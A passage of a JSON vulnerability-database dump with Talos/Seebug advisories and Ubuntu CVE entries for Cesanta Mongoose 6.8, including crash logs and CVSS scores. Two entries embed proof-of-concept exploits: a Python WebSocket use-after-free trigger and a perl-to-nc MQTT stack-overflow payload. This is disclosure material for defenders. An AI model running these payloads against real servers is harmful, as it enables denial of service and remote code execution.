Pointers `p`, `buf`, `e`, `sizep` and `wsm.data` are all initialized based on the original `nc->recv_mbuf` buffer at the beginning of the function:\r\n```\r\nstatic int mg_deliver_websocket_data(struct mg_connection *nc) {\r\n /* Using unsigned char *, cause of integer arithmetic below */\r\n uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len,\r\n mask_len = 0, header_len = 0;\r\n unsigned char *p = (unsigned char *) nc->recv_mbuf.buf, *buf = p,\r\n *e = p + buf_len;\r\n```\r\n\r\nCalling `realloc` won\u2019t always invalidate a pointer, but in this case steps can be taken to make that probability higher, such as opening multiple simultaneous network connections. Not invalidating and updating pointers after `realloc` leads to a use-after-free condition which can be abused to cause denial of service and ultimately remote code execution.\r\n\r\n### Crash Information\r\n```\r\nAddress sanitizer output:\r\n\r\n==88299==ERROR: AddressSanitizer: heap-use-after-free on address 0x619000005f80 at pc 0x00000051b1ee bp 0x7fffffffb490 sp \r\n0x7fffffffb488\r\nREAD of size 1 at 0x619000005f80 thread T0\r\n #0 0x51b1ed in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8874\r\n #1 0x51b1ed in ?? ??:0\r\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\r\n #3 0x5128d4 in ?? ??:0\r\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\r\n #5 0x4f9de6 in ?? ??:0\r\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\r\n #7 0x4fdcf9 in ?? ??:0\r\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\r\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\r\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\r\n #11 0x506603 in ?? 
??:0\r\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #13 0x509dd8 in ?? ??:0\r\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #15 0x4fb695 in ?? ??:0\r\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\r\n #17 0x4ea65a in ?? ??:0\r\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\r\n #19 0x7ffff6ee582f in ?? ??:0\r\n #20 0x418e58 in _start ??:?\r\n #21 0x418e58 in ?? ??:0\r\n\r\n\r\n0x619000005f80 is located 0 bytes inside of 1024-byte region [0x619000005f80,0x619000006380)\r\nfreed by thread T0 here:\r\n #0 0x4b9308 in realloc ??:?\r\n #1 0x4b9308 in ?? ??:0\r\n #2 0x4f0275 in mbuf_resize /home/user/mongoose/examples/websocket_chat/../../mongoose.c:1044 (discriminator 1)\r\n #3 0x4f0275 in ?? ??:0\r\n\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x4b8f88 in __interceptor_malloc ??:?\r\n #1 0x4b8f88 in ?? ??:0\r\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\r\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\r\n #4 0x506453 in ?? ??:0\r\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #6 0x509dd8 in ?? ??:0\r\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #8 0x4fb695 in ?? 
??:0\r\n #4 0x60200000efef (<unknown module>)\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51b1ed)\r\nShadow bytes around the buggy address:\r\n0x0c327fff8ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8bd0: 04 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c327fff8bf0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n0x0c327fff8c40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\nAddressable: 00\r\nPartially addressable: 01 02 03 04 05 06 07\r\nHeap left redzone: fa\r\nHeap right redzone: fb\r\nFreed heap region: fd\r\nStack left redzone: f1\r\nStack mid redzone: f2\r\nStack right redzone: f3\r\nStack partial redzone: f4\r\nStack after return: f5\r\nStack use after scope: f8\r\nGlobal redzone: f9\r\nGlobal init order: f6\r\nPoisoned by user: f7\r\nContainer overflow: fc\r\nArray cookie: ac\r\nIntra object redzone: bb\r\nASan internal: fe\r\nLeft alloca redzone: ca\r\nRight alloca redzone: cb\r\n==88299==ABORTING\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability(CVE-2017-2922)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2922"], "modified": "2017-11-08T00:00:00", "href": 
"https://www.seebug.org/vuldb/ssvid-96811", "id": "SSV:96811", "sourceData": "\n import socket\r\nimport random\r\nimport struct\r\nimport sys\r\nhttp_upgrade = ('GET /chat HTTP/1.1\\r\\n'\r\n 'Host: server.example.com\\r\\n'\r\n 'Upgrade: websocket\\r\\n'\r\n 'Connection: Upgrade\\r\\n'\r\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\r\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\r\n 'Sec-WebSocket-Version: 13\\r\\n'\r\n 'Origin: http://example.com\\r\\n\\r\\n')\r\n\r\n\r\npayload = \"\\x01\" # need to pass two checks:\r\n\"\"\"\r\nstatic int mg_is_ws_fragment(unsigned char flags) {\r\nreturn (flags & 0x80) == 0 || (flags & 0x0f) == 0;\r\n}\r\n\r\n\r\nstatic int mg_is_ws_first_fragment(unsigned char flags) {\r\nreturn (flags & 0x80) == 0 && (flags & 0x0f) != 0;\r\n}\r\npayload += chr(0x00 | 50 ) # packet doesn't have to be masked, so we can ommit it, size doesn't matter\r\npayload += \"A\"*(60+ random.randint(0,20000)) # rest of the packet doesn't matter\r\n\"\"\"\r\nappend random length of garbage so it's a bit easier to trigger the realloc when runing without ASAN ,\r\nvalgrind, or libdislocator, otherwise ~60 is enough\r\n\"\"\"\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1],int(sys.argv[2])))\r\ns.send(http_upgrade)\r\nprint s.recv(1024)\r\ns.send(payload)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96811", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:55:41", "description": "### Summary\r\nAn exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-121: Stack-based Buffer Overflow\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nMQTT SUBSCRIBE command packet can contain multiple topics to subscribe to. If a MQTT SUBSCRIBE packet with upwards of 512 topic subscriptions is sent to the server, an overflow of a stack buffer can lead to an overwrite of adjacent variables or the return address ultimately leading to remote code execution. In function `mg_mqtt_broker_handle_subscribe` topics are handled one by one:\r\n```\r\nuint8_t qoss[512]; [1]\r\n size_t qoss_len = 0;\r\n struct mg_str topic;\r\n uint8_t qos;\r\n int pos;\r\n struct mg_mqtt_topic_expression *te;\r\n\r\n for (pos = 0;\r\n (pos = mg_mqtt_next_subscribe_topic(msg, &topic, &qos, pos)) != -1;) {\r\n qoss[qoss_len++] = qos; [2]\r\n```\r\n\r\nIn the above code, an array of 512 bytes is allocated at [1]. Then, in a for loop at [2] the QOS value is stored inside that buffer and an index is incremented. 
No check to make sure that `qoss_len` doesn\u2019t overflow is present, so a SUBSCRIBE with more than 512 subscriptions will overflow the array and write past it corrupting the stack frame.\r\n\r\nThis vulnerability can be triggered by running the supplied proof of concept to the sample `mqtt_broker` application supplied with the library.\r\n\r\n### Crash Information\r\n```\r\nAddress Sanitizer output:\r\n\r\n==120239==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffb2d0 at pc 0x00000051c985 bp 0x7fffffffaff0 sp \r\n0x7fffffffafe8\r\nWRITE of size 1 at 0x7fffffffb2d0 thread T0\r\n#0 0x51c984 in mg_mqtt_broker_handle_subscribe /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10031\r\n#1 0x51c984 in mg_mqtt_broker /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10112\r\n#2 0x51c984 in ?? ??:0\r\n#3 0x513e76 in mqtt_handler /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:9701\r\n#4 0x513e76 in ?? ??:0\r\n#5 0x4fa245 in mg_call /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2051\r\n#6 0x4fa245 in ?? ??:0\r\n#7 0x4fe437 in mg_recv_common /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2502\r\n#8 0x4fe437 in ?? ??:0\r\n#9 0x50a307 in mg_if_recv_tcp_cb /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2506\r\n#10 0x50a307 in mg_handle_tcp_read /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3372\r\n#11 0x50a307 in mg_mgr_handle_conn /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3497\r\n#12 0x50a307 in ?? ??:0\r\n#13 0x50e9c8 in mg_socket_if_poll /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:3690\r\n#14 0x50e9c8 in ?? ??:0\r\n#15 0x4fbb65 in mg_mgr_poll /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:2232\r\n#16 0x4fbb65 in ?? ??:0\r\n#17 0x4eaffa in main /home/user/mongoose/examples/mqtt_broker/mqtt_broker.c:43\r\n#18 0x4eaffa in ?? 
??:0\r\n#19 0x7ffff683882f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\r\n#20 0x7ffff683882f in ?? ??:0\r\n#21 0x419848 in _start ??:?\r\n#22 0x419848 in ?? ??:0\r\n\r\n\r\nAddress 0x7fffffffb2d0 is located in stack of thread T0 at offset 720 in frame\r\n#0 0x51c61f in mg_mqtt_broker /home/user/mongoose/examples/mqtt_broker/../../mongoose.c:10093\r\n#1 0x51c61f in ?? ??:0\r\nThis frame has 3 object(s):\r\n[32, 132) 'buf.i'\r\n[176, 184) 'p.i'\r\n[208, 720) 'qoss.i' <== Memory access at offset 720 overflows this variable\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51c984)\r\nShadow bytes around the buggy address:\r\n 0x10007fff7600: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7610: 04 f2 f2 f2 f2 f2 00 f2 f2 f2 00 00 00 00 00 00\r\n 0x10007fff7620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x10007fff7650: 00 00 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3\r\n 0x10007fff7660: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10007fff7680: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00\r\n 0x10007fff7690: 00 00 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3\r\n 0x10007fff76a0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07\r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use 
after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==120239==ABORTING\r\n```\r\n\r\n### Timeline\r\n* 2017-08-31 - Vendor Disclosure\r\n* 2017-10-30 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution(CVE-2017-2894)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2894"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96806", "id": "SSV:96806", "sourceData": "\n perl -e 'print \"\\x80\\xff\\x0f\" . \"\\x00\\x00\\x00\\x01a\\x02\\x00\"x400 ' | nc\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96806", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:55:15", "description": "An exploitable memory corruption vulnerability exists in the Websocket\nprotocol implementation of Cesanta Mongoose 6.8. A specially crafted\nwebsocket packet can cause an integer overflow, leading to a heap buffer\noverflow and resulting in denial of service and potential remote code\nexecution. 
An attacker needs to send a specially crafted websocket packet\nover network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2921", "href": "https://ubuntu.com/security/CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:15", "description": "An exploitable use-after-free vulnerability exists in the HTTP server\nimplementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with\na CGI target can cause a reuse of previously freed pointer potentially\nresulting in remote code execution. 
An attacker needs to send this HTTP\nrequest over the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2891", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2891", "href": "https://ubuntu.com/security/CVE-2017-2891", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:15", "description": "An infinite loop programming error exists in the DNS server functionality\nof Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause\nan infinite loop resulting in high CPU usage and Denial Of Service. 
An\nattacker can send a packet over the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2909", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2909", "href": "https://ubuntu.com/security/CVE-2017-2909", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-08-04T13:55:16", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT\npacket parsing functionality of Cesanta Mongoose 6.8. A specially crafted\nMQTT packet can cause an arbitrary out-of-bounds memory read and write\npotentially resulting in information disclosure, denial of service and\nremote code execution. 
An attacker needs to send a specially crafted MQTT\npacket over the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2892", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2892"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2892", "href": "https://ubuntu.com/security/CVE-2017-2892", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:16", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT\npacket parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE\npacket can cause a NULL pointer dereference leading to server crash and\ndenial of service. 
An attacker needs to send a specially crafted MQTT\npacket over the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2893", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2893"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2893", "href": "https://ubuntu.com/security/CVE-2017-2893", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T13:55:15", "description": "An exploitable arbitrary memory read vulnerability exists in the MQTT\npacket parsing functionality of Cesanta Mongoose 6.8. A specially crafted\nMQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read\npotentially resulting in information disclosure and denial of service. 
An\nattacker needs to send a specially crafted MQTT packet over the network to\ntrigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2895", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2895"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2895", "href": "https://ubuntu.com/security/CVE-2017-2895", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-08-04T13:55:15", "description": "An exploitable memory corruption vulnerability exists in the Websocket\nprotocol implementation of Cesanta Mongoose 6.8. A specially crafted\nwebsocket packet can cause a buffer to be allocated while leaving stale\npointers which leads to a use-after-free vulnerability which can be\nexploited to achieve remote code execution. 
An attacker needs to send a\nspecially crafted websocket packet over the network to trigger this\nvulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2922", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2922"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2922", "href": "https://ubuntu.com/security/CVE-2017-2922", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:17", "description": "An exploitable stack buffer overflow vulnerability exists in the MQTT\npacket parsing functionality of Cesanta Mongoose 6.8. A specially crafted\nMQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote\ncode execution. 
An attacker needs to send a specially crafted MQTT packet\nover the network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2894"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2894", "href": "https://ubuntu.com/security/CVE-2017-2894", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-07-04T06:02:23", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and 